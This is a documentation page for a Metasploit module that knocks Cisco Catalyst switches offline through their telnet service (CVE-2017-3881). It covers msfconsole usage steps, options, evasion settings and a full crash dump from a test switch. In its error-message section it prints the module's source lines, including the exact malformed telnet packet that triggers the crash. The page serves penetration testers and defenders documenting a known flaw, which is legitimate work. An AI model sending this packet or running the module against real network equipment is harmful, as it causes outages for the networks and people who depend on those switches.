Cisco IOS Telnet Denial of Service - Metasploit


This page contains detailed information about how to use the auxiliary/dos/cisco/ios_telnet_rocem metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Cisco IOS Telnet Denial of Service
Module: auxiliary/dos/cisco/ios_telnet_rocem
Source code: modules/auxiliary/dos/cisco/ios_telnet_rocem.rb
Disclosure date: 2017-03-17
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 23
List of CVEs: CVE-2017-3881

This module triggers a Denial of Service condition in the Cisco IOS telnet service affecting multiple Cisco switches. Tested against Cisco Catalyst 2960 and 3750.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

msf > use auxiliary/dos/cisco/ios_telnet_rocem
msf auxiliary(ios_telnet_rocem) > show targets
    ... a list of targets ...
msf auxiliary(ios_telnet_rocem) > set TARGET target-id
msf auxiliary(ios_telnet_rocem) > show options
    ... show and set options ...
msf auxiliary(ios_telnet_rocem) > exploit

Required Options

  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base

Vulnerable Application

  1. Obtain a Cisco switch of any model indicated here that is running vulnerable firmware: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp. Note that the vulnerability spans many years. We tested two firmwares 10 years apart and were able to verify exploitability.
  2. Enable telnet access and verify that you can reach the switch normally via that mode.

Verification Steps

  1. Start msfconsole
  2. Do: use auxiliary/dos/cisco/ios_telnet_rocem
  3. Do: set RHOST 192.168.1.10
  4. Do: run
  5. The switch should restart and display crash information on the console.

Scenarios

Switch#sh ver
*Mar  1 01:28:01.802: %SYS-5-CONFIG_I: Configured from console by console
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(53)SE2, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Wed 21-Apr-10 04:49 by prod_rel_team
Image text-base: 0x01000000, data-base: 0x02C00000
ROM: Bootstrap program is C3750 boot loader
BOOTLDR: C3750 Boot Loader (C3750-HBOOT-M) Version 12.2(44)SE5, RELEASE SOFTWARE (fc1)
Switch uptime is 1 hour, 28 minutes
System returned to ROM by power-on
System image file is "flash:/c3750-ipbasek9-mz.122-53.SE2/c3750-ipbasek9-mz.122-53.SE2.bin"
[...]
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
Processor board ID CAT1017Z2Z2
Last reset from power-on
1 Virtual Ethernet interface
48 FastEthernet interfaces
4 Gigabit Ethernet interfaces
The password-recovery mechanism is enabled.
[...]
Cisco IOS Software, C3750 Software (C3750-IPSERVICESK9-M), Version 12.2(55)SE10, RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Wed 11-Feb-15 11:40 by prod_rel_team
Image text-base: 0x01000000, data-base: 0x02F00000
[...]
Election Complete
Switch 2 booting as Master
Waiting for Port download...Complete
[...]
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
Processor board ID CAT1017Z2Z2
Last reset from power-on
1 Virtual Ethernet interface
48 FastEthernet interfaces
4 Gigabit Ethernet interfaces
The password-recovery mechanism is enabled.
[...]
Switch Ports Model              SW Version            SW Image
------ ----- -----              ----------            ----------
*    2 52    WS-C3750-48TS      12.2(55)SE10          C3750-IPSERVICESK9-M
[... booted successfully, waiting at a prompt, DoS exploit follows ...]
Switch#
 00:37:15 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 400, PC = 41414140
-Traceback= 41414140
Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_1
=== Flushing messages (00:37:19 UTC Mon Mar 1 1993) ===
Buffered messages:
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
00:00:50: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 has changed to state DOWN
00:00:50: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
00:00:50: %SYS-5-RESTART: System restarted --
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
00:01:48: %SYS-5-CONFIG_I: Configured from console by console
00:27:53: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:27:54: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
00:28:22: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to down
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:30:01: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to down
00:32:44: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:32:45: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
00:33:13: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
Queued messages:
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
Instruction Access Exception (0x0400)!
SRR0 = 0x41414140  SRR1 = 0x00029230  SRR2 = 0x00648990  SRR3 = 0x00021200
ESR = 0x00000000  DEAR = 0x00000000  TSR = 0x8C000000  DBSR = 0x00000000
CPU Register Context:
Vector = 0x00000400  PC = 0x41414140  MSR = 0x00029230  CR = 0x53000005
LR = 0x41414141  CTR = 0x0004D860  XER = 0xC0000050
R0 = 0x41414141  R1 = 0x02DDEE80  R2 = 0x00000000  R3 = 0x0358907C
R4 = 0x00000001  R5 = 0xFFFFFFFF  R6 = 0x0182C1B0  R7 = 0x00000000
R8 = 0x00000001  R9 = 0x0290C84C  R10 = 0x00000031  R11 = 0x00000000
R12 = 0x00221C89  R13 = 0x00110000  R14 = 0x00BD7284  R15 = 0x00000000
R16 = 0x00000000  R17 = 0x00000000  R18 = 0x00000000  R19 = 0x00000000
R20 = 0xFFFFFFFF  R21 = 0x00000000  R22 = 0x00000000  R23 = 0x02DDF078
R24 = 0x00000000  R25 = 0x00000001  R26 = 0x000003FB  R27 = 0x00000024
R28 = 0x41414141  R29 = 0x41414141  R30 = 0x41414141  R31 = 0x41414141
Stack trace:
PC = 0x41414140, SP = 0x02DDEE80
Frame 00: SP = 0x41414141    PC = 0x41414141
Switch uptime is 37 minutes, 22 seconds
[... rebooting ... ]
Switch   Ports  Model              SW Version              SW Image
------   -----  -----              ----------              ----------
*    1   52     WS-C3750-48TS      12.2(35)SE5             C3750-IPBASEK9-M
Failed to generate persistent self-signed certificate.
    Secure server will use temporary self-signed certificate.
Press RETURN to get started!
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
00:00:31: %SYS-5-CONFIG_I: Configured from memory by console
00:00:31: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 h
Switch>
Switch>as changed to state DOWN
00:00:32: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
00:00:32: %SYS-5-RESTART: System restarted --
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
00:00:33: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:00:34: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
Switch>
Switch>
00:01:04: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
00:01:32: %PLATFORM-1-CRASHED: System previously crashed with the following message:
00:01:32: %PLATFORM-1-CRASHED: Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
00:01:32: %PLATFORM-1-CRASHED: Copyright (c) 1986-2007 by Cisco Systems, Inc.
00:01:32: %PLATFORM-1-CRASHED: Compiled Fri 20-Jul-07 01:58 by nachen
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: Instruction Access Exception (0x0400)!
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: SRR0 = 0x41414140  SRR1 = 0x00029230  SRR2 = 0x00648990  SRR3 = 0x00021200
00:01:32: %PLATFORM-1-CRASHED: ESR = 0x00000000  DEAR = 0x00000000  TSR = 0x8C000000  DBSR = 0x00000000
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: CPU Register Context:
00:01:32: %PLATFORM-1-CRASHED: Vector = 0x00000400  PC = 0x41414140  MSR = 0x00029230  CR = 0x53000005
00:01:32: %PLATFORM-1-CRASHED: LR = 0x41414141  CTR = 0x0004D860  XER = 0xC0000050
00:01:32: %PLATFORM-1-CRASHED: R0 = 0x41414141  R1 = 0x02DDEE80  R2 = 0x00000000  R3 = 0x0358907C
00:01:32: %PLATFORM-1-CRASHED: R4 = 0x00000001  R5 = 0xFFFFFFFF  R6 = 0x0182C1B0  R7 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R8 = 0x00000001  R9 = 0x0290C84C  R10 = 0x00000031  R11 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R12 = 0x00221C89  R13 = 0x00110000  R14 = 0x00BD7284  R15 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R16 = 0x00000000  R17 = 0x00000000  R18 = 0x00000000  R19 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R20 = 0xFFFFFFFF  R21 = 0x00000000  R22 = 0x00000000  R23 = 0x02DDF078
00:01:32: %PLATFORM-1-CRASHED: R24 = 0x00000000  R25 = 0x00000001  R26 = 0x000003FB  R27 = 0x00000024
00:01:32: %PLATFORM-1-CRASHED: R28 = 0x41414141  R29 = 0x41414141  R30 = 0x41414141  R31 = 0x41414141
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: Stack trace:
00:01:32: %PLATFORM-1-CRASHED: PC = 0x41414140, SP = 0x02DDEE80
00:01:32: %PLATFORM-1-CRASHED: Frame 00: SP = 0x41414141    PC = 0x41414141
00:01:32: %PLATFORM-1-CRASHED:

Go back to menu.

Msfconsole Usage

Here is how the dos/cisco/ios_telnet_rocem auxiliary module looks in the msfconsole:

msf6 > use auxiliary/dos/cisco/ios_telnet_rocem

msf6 auxiliary(dos/cisco/ios_telnet_rocem) > show info

       Name: Cisco IOS Telnet Denial of Service
     Module: auxiliary/dos/cisco/ios_telnet_rocem
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-03-17

Provided by:
  Artem Kondratenko

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   23               yes       The target port (TCP)

Description:
  This module triggers a Denial of Service condition in the Cisco IOS 
  telnet service affecting multiple Cisco switches. Tested against 
  Cisco Catalyst 2960 and 3750.

References:
  http://www.securityfocus.com/bid/96960
  https://nvd.nist.gov/vuln/detail/CVE-2017-3881
  https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp
  https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution

Module Options

This is a complete list of options available in the dos/cisco/ios_telnet_rocem auxiliary module:

msf6 auxiliary(dos/cisco/ios_telnet_rocem) > show options

Module options (auxiliary/dos/cisco/ios_telnet_rocem):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   23               yes       The target port (TCP)

Advanced Options

Here is a complete list of advanced options supported by the dos/cisco/ios_telnet_rocem auxiliary module:

msf6 auxiliary(dos/cisco/ios_telnet_rocem) > show advanced

Module advanced options (auxiliary/dos/cisco/ios_telnet_rocem):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CHOST                            no        The local client address
   CPORT                            no        The local client port
   ConnectTimeout  10               yes       Maximum number of seconds to establish a TCP connection
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                        no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode   PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion      Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE         false            no        Enable detailed status messages
   WORKSPACE                        no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the dos/cisco/ios_telnet_rocem module can do:

msf6 auxiliary(dos/cisco/ios_telnet_rocem) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the dos/cisco/ios_telnet_rocem auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(dos/cisco/ios_telnet_rocem) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Failed to get initial packet from telnet service.

Here is a relevant code snippet related to the "Failed to get initial packet from telnet service." error message:

33:	    begin
34:	      connect
35:	      print_status "Connected to telnet service"
36:	      packet = sock.read(200)
37:	      if packet.nil?
38:	        print_error "Failed to get initial packet from telnet service."
39:	      else
40:	        print_status "Got initial packet from telnet service: " + packet.inspect
41:	      end
42:	      print_status "Sending Telnet DoS packet"
43:	      sock.put("\xff\xfa\x24\x00\x03CISCO_KITS\x012:" + Rex::Text.rand_text_alpha(1000) + ":1:\xff\xf0")

Unable to connect to <RHOST>:<RPORT>.

Here is a relevant code snippet related to the "Unable to connect to <RHOST>:<RPORT>." error message:

41:	      end
42:	      print_status "Sending Telnet DoS packet"
43:	      sock.put("\xff\xfa\x24\x00\x03CISCO_KITS\x012:" + Rex::Text.rand_text_alpha(1000) + ":1:\xff\xf0")
44:	      disconnect
45:	    rescue ::Rex::ConnectionRefused
46:	      print_status "Unable to connect to #{rhost}:#{rport}."
47:	    rescue ::Errno::ECONNRESET
48:	      print_good "DoS packet successful. #{rhost} not responding."
49:	    end
50:	  end
51:	end

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • Artem Kondratenko

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.